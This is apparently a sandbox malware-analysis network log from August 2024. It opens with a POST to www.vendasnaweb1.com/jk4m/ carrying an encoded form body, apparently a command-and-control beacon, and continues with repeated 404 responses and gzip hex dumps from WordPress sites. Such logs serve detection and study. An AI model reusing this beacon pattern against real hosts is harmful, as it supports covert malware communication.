HTTP traffic detected: POST /jk4m/ HTTP/1.1Host: www.vendasnaweb1.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Length: 202Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeOrigin: http://www.vendasnaweb1.comReferer: http://www.vendasnaweb1.com/jk4m/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 34 78 32 78 70 75 4d 43 6c 66 63 72 64 70 4f 6f 4c 6b 4b 65 4b 32 52 78 7a 6c 6d 35 42 49 4f 6c 59 45 33 75 58 2f 70 73 4a 59 54 41 5a 6d 53 41 4d 42 6c 7a 48 31 41 6f 6d 32 35 48 2f 6b 46 4b 74 41 6a 35 65 4c 39 44 49 4b 66 62 71 71 42 50 39 33 2f 76 72 64 59 53 72 43 2b 42 72 63 44 68 74 63 6e 63 44 61 6e 49 39 70 69 77 4f 78 50 63 58 71 66 6e 79 47 48 72 58 42 64 47 69 69 73 78 71 37 31 76 76 4f 55 34 79 6d 6e 44 34 34 65 4d 64 69 2f 4a 67 5a 6b 2f 41 67 6f 44 78 68 6b 5a 7a 63 52 69 4f 33 59 5a 44 32 4e 43 4f 4e 68 6d 70 71 69 72 77 3d 3d Data Ascii: 4NZpb=LWzjlNPDNkqeO4x2xpuMClfcrdpOoLkKeK2Rxzlm5BIOlYE3uX/psJYTAZmSAMBlzH1Aom25H/kFKtAj5eL9DIKfbqqBP93/vrdYSrC+BrcDhtcncDanI9piwOxPcXqfnyGHrXBdGiisxq71vvOU4ymnD44eMdi/JgZk/AgoDxhkZzcRiO3YZD2NCONhmpqirw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_5063416e1289b199f2413e8737e4ca%7C%7C1725019450%7C%7C1725015850%7C%7Cceb62e721885b64e1797ee288a644a39; expires=Fri, 30-Aug-2024 12:04:10 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7Jb45O%2F58zDZA7wBpQvRHF%2FnNwZ%2BtBualZ1TqGrDukHaoO%2FFAOZU5vBUn%2FNvODMGvQRKOP7N10CqreOWygb2jVDdpqVneUfd2J3z3LR%2B5T78GrEGva1tFzZq9wOBaJbhzY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba4298e590842f1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 6e b6 64 39 9b 49 a7 a7 7b 27 99 f4 b4 d3 5f 7f bd 89 57 07 22 21 89 36 45 32 04 69 d9 ed d6 03 ed 6b ec 93 ed 29 00 24 41 8a ba f8 92 99 d9 b3 5f cf c4 92 80 42 a1 50 00 0a 85 42 a1 70 fa ec fb 8f 6f 3f fd fe f3 3b 34 4f 16 fe d9 e1 e9 33 4d fb ec 4d d1 4f ef d0 09 ba 38 43 a7 90 8c 7c 1c cc 46 0a 09 b4 5f cf 15 e4 f8 98 d2 91 e2 91 13 e4 87 d8 f5 82 99 46 bd 84 a0 20 d4 2e a9 72 86 4e 9f 7d 26 81 eb 4d 2f 34 ad 84 ef 78 17 be e3 7b e0 6b ce 12 c2 88 6c fd f9 ac f9 d3 bb d6 c5 19 e4 9c 6d Data Ascii: 36c9}v8o}XRnd9I{'_W"!6E2ik)$A_BPBpo?;4O3MMO8C\|F_F .rN}&M/4x{klm
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_ffb160b8a35cf1a8ebfd13dcf4b1ef%7C%7C1725019453%7C%7C1725015853%7C%7C1698686f1ff4342c0ee039076d21f46f; expires=Fri, 30-Aug-2024 12:04:13 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAHIDblWZMBoVnCky%2BdXB78e9qmR%2FCMHlo5MNucYLNiG1BtPr%2Fkl0ckJc0UWdKoshdPzns%2B8HqBwAL4wwTGhJXM05S%2BmopFWTc%2B3qlvShCLzvK8O0KBauO%2BVlb73sWPliT0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba4299e0a1f429d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d ed 76 db 38 b2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 6f 7d d8 96 2c 67 33 e9 f4 74 ef 24 93 9e 76 fa f6 ed 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b7 1f 68 5f 63 9f 6c 4f 01 20 09 52 a4 24 7f 64 66 f6 ec ed 99 58 12 50 28 14 0a 40 a1 50 28 14 4e 9e 7d ff f1 ed a7 df 7f 7e 87 16 c9 d2 3f dd 3f 79 a6 69 9f bd 19 fa e9 1d 3a 46 e7 a7 e8 04 92 91 8f 83 f9 58 21 81 f6 eb 99 82 1c 1f 53 3a 56 3c 72 8c fc 10 bb 5e 30 d7 a8 97 10 14 84 da 05 55 4e d1 c9 b3 cf 24 70 bd d9 b9 a6 95 f0 1d 6d c3 77 74 0f 7c ed 79 42 18 91 9d 3f 9f b5 7f 7a d7 39 3f 85 Data Ascii: 36c6}v8o}XRo},g3t$vM:I)!Hnh_clO R$dfXP(@P(N}~??yi:FX!S:V<r^0UN$pmwt\|yB?z9?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_b21e6b470e46914bacef13fb9474ae%7C%7C1725019455%7C%7C1725015855%7C%7Cb952974e6c119af1c02ddd0a324ce78b; expires=Fri, 30-Aug-2024 12:04:15 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7YaOfMKytBCR1sb9a1fQDo870HlpHNeUvOL8WqcjvG1QL41DxFQ4h3GrhguKz7SpjCNuwo%2Flw4CSNSP%2BeRdzAmMzTNaaNhZ5KkwXBlt%2FU3lna1QF5DGZ9VeqQHJpSNLwSI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba429addc408cdd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 2e b6 25 cb d9 4c 3a 3d dd 3b c9 a4 a7 9d fe fa eb 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b5 1e 68 5f 63 9f 6c 4f 01 20 09 52 d4 c5 97 cc cc 9e fd 7a 26 96 04 14 0a 85 02 50 28 14 0a 85 b3 67 df 7f 7c fb e9 f7 9f df a1 59 32 f7 cf 0f cf 9e 69 da 67 6f 82 7e 7a 87 4e d1 e5 39 3a 83 64 e4 e3 60 3a 54 48 a0 fd 7a a1 20 c7 c7 94 0e 15 8f 9c 22 3f c4 ae 17 4c 35 ea 25 04 05 a1 76 45 95 73 74 f6 ec 33 09 5c 6f 72 a9 69 25 7c 27 bb f0 9d dc 03 5f 73 9a 10 46 64 eb cf 67 cd 9f de b5 2e cf 21 e7 7c 33 fa 0d a8 35 ad Data Ascii: 36c8}v8o}XR.%L:=;M:I)!Hnh_clO Rz&P(g\|Y2igo~zN9:d`:THz "?L5%vEst3\ori%\|'_sFdg.!\|35
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
